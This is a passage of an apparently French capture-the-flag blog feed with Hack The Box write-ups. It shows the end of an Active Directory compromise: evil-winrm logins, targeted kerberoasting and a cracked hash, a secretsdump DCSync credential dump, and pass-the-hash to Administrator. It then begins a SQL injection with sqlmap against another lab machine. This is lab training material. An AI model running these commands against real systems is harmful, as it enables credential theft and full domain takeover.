class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:administrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.42 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> administrator.htb<span class="se">\e</span>mily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-flag">User flag </h3><p>Finalement, on obtient le flag utilisateur grâce à Emily</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily<span class="se">\D</span>esktop&gt; cat user.txt </span></span><span class="line"><span class="cl">3415.....de32 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="emily---ethan">Emily -&gt; Ethan </h3><p>On doit faire un kerberosting. D&rsquo;après le write-up, il y avait une manière plus simple de le faire grace a ce repo github qui fait toutes les etapes qu&rsquo;on a effectué à la main d&rsquo;un coup:</p> <blockquote> <p>git clone <a class="link" href="https://github.com/ShutdownRepo/targetedKerberoast" target="_blank" rel="noopener" >https://github.com/ShutdownRepo/targetedKerberoast</a></p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Depuis Emily evilWinrm</span> </span></span><span class="line"><span class="cl">. .<span class="se">\P</span>owerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Set-DomainObject -Identity Ethan -Set @<span class="o">{</span><span class="nv">serviceprincipalname</span><span class="o">=</span><span class="s1">&#39;fakeService/targetHost&#39;</span><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Depuis Kali</span> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Downloads<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo ntpdate administrator.htb </span></span><span class="line"><span class="cl">2024-11-29 16:04:44.623613 <span class="o">(</span>-0500<span class="o">)</span> +25200.766571 +/- 0.493670 administrator.htb 10.10.11.42 s1 no-leap </span></span><span class="line"><span class="cl">CLOCK: <span class="nb">time</span> stepped by 25200.766571 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Downloads<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ GetUserSPNs.py administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -request </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hashcat -m <span class="m">13100</span> -a <span class="m">0</span> ethan_hash.txt ~/wordlists/rockyou.txt --optimized-kernel-enable --show leopold@leopold-ZenBook-UX434FAC-UX434FA </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>ethan<span class="nv">$ADMINISTRATOR</span>.HTB<span class="nv">$administrator</span>.htb/ethan*<span class="nv">$78</span>ac2707afa86369c7b7ac6481d4f104<span class="nv">$90702</span>b9d78c06a35af5186690e4534b9432409b6e97765e513071ac185c0547c06cb3a2bf9b7268791819e21671adc50267d2233c02f05a3528d9a3341a87a2f470a8b7cf56a3d326751f9def7e0ba074bc3898d2159339e52406c576ce48895c687ad7460ed922d25a7f311197ab8ba2dd2f407690371cea35ab9509f4323aef68705ff3a735d7a461691040e3f6cee60cf8872450c1915429bc741357983166310c5664995fbb6d2e94d555c8ecd59e01f951860d21da3adda55559976f5472be684af958d97e449d1359f5c21e24cd684a1b4db78ff6386b7b02dcecc7bec3bd3b073ac659d50f2e168563a99ff4e8a75460d653acc88eda530e4de755074de68faa776a437a45ce3a681e63edd36130040528f02bf655f8b2ef8fdac61d33c10c10573f4641551d55a950bc13ca30d4dbe622be89f6296f0d330352910d3df0d4c659408a422dbba104e64d3e061a9a182167250a3943ad22a24aceb2e7c51a2e76fc14125c88fb0990601a8f28b2ee96da6da4cf743800c7777e0549fa84d96504a8e250deeb266786714f9d3aa19fcb0f60cf60b788f6def223a11dfda0e0bbbbff61293d7c30925f7f743494f9950fd6684d6f60ab77494e726a75178cf7112b961665ea10213fbb40702faa66dcecd6c7be70738ee8d6e25bafc67962d7aa43cb4a36eb367ecffe26060cc38f411d26e41a3a37ea0d62e3be77d42daee37a277ac464d8b1e2b3d2b5587d2ef0bac76a15009361f4d5256be13b408617cf910a9faa14d1f7997fe85c51ee20f0977fd60381b815f0acff3cb3d4b6a1a6ff72f0d75d03190ed77c663cdd6cc2c11f87916456861d928554bc0cea4f2b05ea58afff209e19964ad6a5e69c2775a17645f61e39c24dd3b9705272580e72db2438ee10e26ce49cedcc6d40727d8d9eb839db1029fbe39d197208829689909afca82def5d5143bf5e80d7486bace7c1ce7364615030fe65555f03f8fc90791c3d3760feaa03e7e6c9b4654e80ccb1bc5803bb3735e17b3e025fccd1e510aff673cd9d17bb03d1ffd1a7ffaf60b730a619263ed6b67af39efff762026ef683e8b0d330c1f1da452383fab9acb9c652257b3400e2190f4603361cf61f7d187d15a71702bbc95eec7838de2ae64584e64d8ee59de45de529a913f473a52a312dd66b3645b1b0d001147ad744436b8cfdb72af6dc5defe880a6170c24ee592d53f3b8874678c202be3fdcc5b412b59b5800fcd25641bbb8e443f1b94f25c206a628ef448eb0d205b0cf7ec9c90374d53f20fff82be21a8002a6de850eeb67e16e0e6e0022ecaa54ef7ef46c0b0bf38d819c28863e1611d6112b08683ae1ac7c3cee339587b502e83369f27b7b445964fa6efb504fec49f0c5a319aa341273a50902ee8531e27b289afa18c617eaa5d806303d723045102267a39773e6da6e1e4949cf3fdcea35174107c6205feb621037c4dcb074a3b3684434ca2da040e93e981ad3f12e7bb106a9bc2824f5ac151556eaea4a97a972deb5da307d67938fe59:limpbizkit </span></span></code></pre></td></tr></table> </div> </div><p>On obtient les creds de Ethan:<code>limpbizkit</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">rpcclient -U <span class="s2">&#34;administrator.htb\ethan%limpbizkit&#34;</span> 10.10.11.42 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ldapsearch -x -H ldap://10.10.11.42 -D <span class="s2">&#34;ethan@administrator.htb&#34;</span> -w <span class="s2">&#34;limpbizkit&#34;</span> -b <span class="s2">&#34;DC=administrator,DC=htb&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Tentatives d&#39;ouvertur d&#39;un shell</span> </span></span><span class="line"><span class="cl">$ evil-winrm -i 10.10.11.42 -u ethan -p limpbizkit </span></span><span class="line"><span class="cl">$ wmiexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span><span class="line"><span class="cl">$ psexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span><span class="line"><span class="cl">$ dcomexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="secretsdump">Secretsdump </h3><p>On récupère le hash de l&rsquo;administrateur grâce au script secretsdump et aux droits de l&rsquo;utilisateur ethan.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">secretsdump.py -just-dc ethan:limpbizkit@10.10.11.42 -outputfile dcsync_hashes </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span>id:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:1109:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:1110:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9::: </span></span><span class="line"><span class="cl">DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Kerberos keys grabbed </span></span><span class="line"><span class="cl">Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 </span></span><span class="line"><span class="cl">Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2 </span></span><span class="line"><span class="cl">Administrator:des-cbc-md5:403286f7cdf18385 </span></span><span class="line"><span class="cl">krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648 </span></span><span class="line"><span class="cl">krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94 </span></span><span class="line"><span class="cl">krbtgt:des-cbc-md5:2c0bc7d0250dbfc7 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:des-cbc-md5:bc2a4a7929c198e9 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:aes256-cts-hmac-sha1-96:de3afc157b17c25bf056296233cf23629c06aa2f19d414afbe0afe3da7d59835 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:aes128-cts-hmac-sha1-96:038498213933ca1f3d43b4d7f6b0a572 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:des-cbc-md5:07bf8f89c229c219 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:aes256-cts-hmac-sha1-96:c0e6eaa8e841c72e55ef6a938565403e27aa728f5397e75d8cae6cd3423957bd </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:aes128-cts-hmac-sha1-96:3e8b0ff2f07fd2178ec4d33f1ad0bc4b </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:des-cbc-md5:4a4aa4e3bc5eab61 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:des-cbc-md5:804343fb6e0dbc51 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:des-cbc-md5:58387aef9d6754fb </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:des-cbc-md5:49ba9dcb6d07d0bf </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:des-cbc-md5:3249fba89813ef5d </span></span><span class="line"><span class="cl">DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb </span></span><span class="line"><span class="cl">DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d </span></span><span class="line"><span class="cl">DC$:des-cbc-md5:f483547c4325492a </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span></code></pre></td></tr></table> </div> </div><h3 id="evil-winrm">Evil-winrm </h3><p>En utilisant le hash de l&rsquo;administrator on peut directement se connecter avec <code>evil-winrm</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ evil-winrm -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -i 10.10.11.42 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 11/29/2024 10:54 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">8431.....8a6b </span></span></code></pre></td></tr></table> </div> </div><h3 id="pass-the-ticket-attack-ptt">Pass The Ticket Attack (PTT) </h3><p>PAS REUSSI, FINALEMENT PAS UTILE ?</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span>Administrator.ccache </span></span><span class="line"><span class="cl"><span class="c1">## On récupère un ticket</span> </span></span><span class="line"><span class="cl">getTGT.py ADMINISTRATOR.HTB/Administrator -aesKey 9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator.ccache </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/usage-htb/Thu, 08 Aug 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/usage-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Usage cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Usage</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.18</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap 10.10.11.18 -p80,22 </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">22/tcp open ssh </span></span><span class="line"><span class="cl">80/tcp open http </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="usagehtb">usage.htb </h3><p>On trouve une site web sur le port 80 de la machine, qui nous redirige vers : <strong>usage.htb</strong>. On ajoute alors le nom de domaine dans <strong>/etc/hosts</strong>.</p> <h3 id="sql-injection">SQL Injection </h3><p>Sur le site web, on remarque une page de connexion. Il y a une section &ldquo;mot de passe oublié&rdquo;. Lorsqu&rsquo;on s&rsquo;y rend et qu&rsquo;on écrit une email avec un <code>'</code>, on remarque que le serveur affiche un message d&rsquo;erreur. L&rsquo;input semble vulnérable à une possible injection SQL. On utilise donc sqlmap pour vérifier cela :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sqlmap -r request.txt --data<span class="o">=</span><span class="s2">&#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#34;</span> -p email --batch --level <span class="m">5</span> --risk <span class="m">3</span> --threads <span class="m">10</span> --dbs </span></span><span class="line"><span class="cl"> ___ </span></span><span class="line"><span class="cl"> __H__ </span></span><span class="line"><span class="cl"> ___ ___<span class="o">[</span><span class="s2">&#34;]_____ ___ ___ {1.6.4#stable} </span></span></span><span class="line"><span class="cl"><span class="s2">|_ -| . [,] | .&#39;| . | </span></span></span><span class="line"><span class="cl"><span class="s2">|___|_ [,]_|_|_|__,| _| </span></span></span><span class="line"><span class="cl"><span class="s2"> |_|V... |_| https://sqlmap.org </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[*] starting @ 23:16:02 /2024-08-06/ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[23:16:02] [INFO] parsing HTTP request from &#39;request.txt&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:16:02] [INFO] testing connection to the target URL </span></span></span><span class="line"><span class="cl"><span class="s2">got a 302 redirect to &#39;http://usage.htb/forget-password&#39;. Do you want to follow? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s2">redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s2">[23:16:05] [INFO] testing if the target URL content is stable </span></span></span><span class="line"><span class="cl"><span class="s2">you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s2">[23:16:08] [WARNING] 